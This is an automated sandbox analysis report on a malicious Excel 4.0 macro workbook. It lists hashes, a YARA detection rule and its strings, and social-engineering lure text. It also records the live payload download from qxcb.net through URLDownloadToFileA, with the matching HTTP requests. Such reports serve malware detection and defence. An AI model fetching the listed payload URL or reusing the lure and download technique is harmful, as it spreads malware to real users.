Loading ...

Play interactive tourEdit tour

Analysis Report Document3327.xlsb

Overview

General Information

Sample Name:Document3327.xlsb
Analysis ID:320378
MD5:822af84271593f38687a040b58296623
SHA1:dbed50d46694c84d25028d749fa8843fcfe474a1
SHA256:cd425ac6a7e11a5cea9eaa3cb57dd062627dc197d03293cc9240c904aef2de6b

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malicious Excel 4.0 Macro
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Found obfuscated Excel 4.0 Macro
Allocates a big amount of memory (probably used for heap spraying)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Yara signature match

Classification

Startup

  • System is w10x64
  • EXCEL.EXE (PID: 7084 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
Document3327.xlsbSUSP_MalDoc_ExcelMacroDetects malicious Excel macro ArtifactsJames Quinn
  • 0x525c5:$artifact1: 5C 00 6D 00 65 00 74 00 61 00 73 00 74 00 61 00 2E 00 6D 00 65 00
  • 0x4c7a0:$url1: http://
  • 0x4cbb2:$url1: http://
  • 0x57426:$url1: http://
  • 0x4ddad:$import1: URLDownloadToFileA
  • 0x5075a:$import1: URLDownloadToFileA
  • 0x15a6:$macro: xl/macrosheets/
  • 0x16a9:$macro: xl/macrosheets/
  • 0x4ab6b:$macro: xl/macrosheets/
  • 0x58175:$macro: xl/macrosheets/
  • 0x581c7:$macro: xl/macrosheets/
  • 0x596a9:$macro: xl/macrosheets/

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

Software Vulnerabilities:

barindex
Document exploit detected (UrlDownloadToFile)Show sources
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: unknown origin: URLDownloadToFileA
Source: excel.exeMemory has grown: Private usage: 1MB later: 118MB
Source: global trafficDNS query: name: qxcb.net
Source: global trafficTCP traffic: 192.168.2.4:49737 -> 198.57.244.39:80
Source: global trafficTCP traffic: 192.168.2.4:49737 -> 198.57.244.39:80
Source: global trafficHTTP traffic detected: GET /ds/161120.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: qxcb.netConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /ds/161120.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: qxcb.netConnection: Keep-Alive
Source: unknownDNS traffic detected: queries for: qxcb.net
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: Document3327.xlsbString found in binary or memory: http://qxcb.net/ds/161120.gif
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://api.aadrm.com/
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://api.diagnostics.office.com
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://api.microsoftstream.com/api/
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://api.office.net
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://api.onedrive.com
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://apis.live.net/v5.0/
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://augloop.office.com
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://augloop.office.com/v2
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://autodiscover-s.outlook.com
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://cdn.entity.
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://clients.config.office.net/
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://config.edge.skype.com
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://cortana.ai
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://cr.office.com
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://dataservice.o365filtering.com
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://dataservice.o365filtering.com/
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://devnull.onenote.com
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://directory.services.
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://graph.ppe.windows.net
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://graph.ppe.windows.net/
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://graph.windows.net
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://graph.windows.net/
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://incidents.diagnostics.office.com
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://lifecycle.office.com
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://login.microsoftonline.com/
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://login.windows.local
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://management.azure.com
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://management.azure.com/
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://messaging.office.com/
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://ncus-000.contentsync.
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://ncus-000.pagecontentsync.
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://officeapps.live.com
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://onedrive.live.com
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://onedrive.live.com/embed?
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://outlook.office.com
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://outlook.office365.com
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://powerlift.acompli.net
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://settings.outlook.com
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://shell.suite.office.com:1443
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://skyapi.live.net/Activity/
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://store.office.cn/addinstemplate
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://store.office.com/addinstemplate
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://store.office.de/addinstemplate
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://tasks.office.com
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://templatelogging.office.com/client/log
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://web.microsoftstream.com/video/
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://wus2-000.contentsync.
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://wus2-000.pagecontentsync.
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: E686101D-62B1-4FED-AC7A-87B20396F87E.0.drString found in binary or memory: https://www.odwebp.svc.ms

System Summary:

barindex
Found malicious Excel 4.0 MacroShow sources
Source: Document3327.xlsbInitial sample: urlmon
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Screenshot number: 4Screenshot OCR: Enable editing" to unlock the editing document downloaded from the internet.y 0Protected View This
Source: Screenshot number: 4Screenshot OCR: Enable content" to perform Microsoft Word Decryption Core to start the decryption of the document.
Found Excel 4.0 Macro with suspicious formulasShow sources
Source: Document3327.xlsbInitial sample: CALL
Source: Document3327.xlsbInitial sample: CALL
Found abnormal large hidden Excel 4.0 Macro sheetShow sources
Source: Document3327.xlsbInitial sample: Sheet size: 564787
Found obfuscated Excel 4.0 MacroShow sources
Source: Document3327.xlsbInitial sample: High usage of CHAR() function: 129
Source: Document3327.xlsb, type: SAMPLEMatched rule: SUSP_MalDoc_ExcelMacro date = 2020-11-03, author = James Quinn, description = Detects malicious Excel macro Artifacts, reference = YARA Exchange - Undisclosed Macro Builder
Source: classification engineClassification label: mal72.expl.evad.winXLSB@1/6@1/1
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{40CE8188-5CF8-4E8C-A47D-50739E9A5BA5} - OProcSessId.datJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: Document3327.xlsbInitial sample: OLE zip file path = xl/media/image1.png
Source: Document3327.xlsbInitial sample: OLE zip file path = xl/media/image2.png
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting4Path InterceptionExtra Window Memory Injection1Masquerading1OS Credential DumpingFile and Directory Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumNon-Application Layer Protocol2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsExploitation for Client Execution13Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemorySystem Information Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothApplication Layer Protocol12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Scripting4Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Extra Window Memory Injection1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://wus2-000.contentsync.0%URL Reputationsafe
https://wus2-000.contentsync.0%URL Reputationsafe
https://wus2-000.contentsync.0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
